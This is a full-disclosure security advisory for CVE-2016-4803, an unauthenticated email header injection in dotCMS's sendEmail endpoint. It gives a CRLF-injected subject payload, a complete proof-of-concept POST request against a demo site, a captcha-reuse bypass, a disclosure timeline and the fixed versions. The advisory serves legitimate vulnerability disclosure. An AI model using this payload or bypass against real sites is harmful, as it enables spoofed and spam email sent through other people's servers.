dotCMS Email Header Injection
Posted on 27 May 2016
Title: CVE-2016-4803 dotCMS - Email Header Injection Credit: Elar Lang / https://security.elarlang.eu Vulnerability: Email Header Injection Vulnerable version: before 3.5 / 3.3.2 CVE: CVE-2016-4803 Vendor: dotCMS (http://dotcms.com/) # Description dotCMS has an email sending functionality at path /dotCMS/sendEmail/ Some parameters are vulnerable to Email Header Injection. # Preconditions There is no pre-condition on authentication or on authorization to access this functionality. If captcha is required for the web page, then the only precondition would be captcha. However, captcha is renewed only when you access the captcha image - in other words, you can load it once and manually set the correct value. After this step the "captcha effect" is bypassed. # Proof-of-Concept Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1 on 7th of December 2015. ## Value for subject (%0D%0A is for ): subject=subject%0D%0AX-PoC-of-New-Line%3A+True ## Proof-of-Concept POST request: <code> POST /dotCMS/sendEmail HTTP/1.1 Host: demo2.dotcms.com ... Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ... Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 218 from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send </code> ## Received email source: <code> Message-ID: <1894336506.1449476889789.JavaMail.dotcms@democms1.dotcms.net> From: myemail To: youremail Subject: subject X-PoC-of-New-Line: True MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4_698773753.1449476889786" X-RecipientId: null Date: Mon, 7 Dec 2015 03:28:09 -0500 (EST) ------=_Part_4_698773753.1449476889786 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit ... removed ... </code> ## Result >From the received email source, it is visible that the subject value created 2 different lines: <code> Subject: subject X-PoC-of-New-Line: True </code> Proof-of-Concept on how to send a multipart email with an attachment and a more detailed description is available at: https://security.elarlang.eu/cve-2016-4803-dotcms-email-header-injection-vulnerability-full-disclosure.html # Vulnerability Disclosure Timeline 2015-12-04 .. 07 | me | detected vulnerability, wrote Proof-of-Concept 2015-12-07 | me > dotCMS | sent a letter with detailed description of email header injection and some related vulnerabilities 2015-12-14 | me > dotCMS | sent another letter with SQL injections vulnerabilities and asked feedback about "email header injection" vulnerabilities 2015-12-14 | dotCMS > me | they were going to review my emails and asked to resend "email header injection" description 2015-12-14 | me > dotCMS | I resent "email header injection" description 2015-12-14 | dotCMS > me | they were planning fixes in upcoming release, estimated to beginning of 2016. They thanked and wrote "security is something we take seriously" 2016-04-07 | me > dotCMS | 5 months since first report, what is the situation with reported vulnerabilities? 2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by sanitizing and email header injection #8841" 2016-04-07 | dotCMS > me | email header injection will be fixed in 3.5, which is estimated to be out in mid-April 2016-04-19 | dotCMS | dotCMS version 3.5 release 2016-05-09 | me > dotCMS | asked confirmation and version numbers about fixes for CVE and Full Disclosure 2016-05-10 | dotCMS > me | email header injection is fixed in versions 3.5 and 3.3.2. 2016-05-10 | dotCMS | dotCMS version 3.3.2 release 2016-05-24 | me | Full Disclosure on security.elarlang.eu # Fixes Update dotCMS at least to version 3.5 or 3.3.2. https://dotcms.com/docs/latest/change-log#release-3.5 https://dotcms.com/docs/latest/change-log#release-3.3.2 -- Elar Lang Blog @ https://security.elarlang.eu Pentester, lecturer @ http://www.clarifiedsecurity.com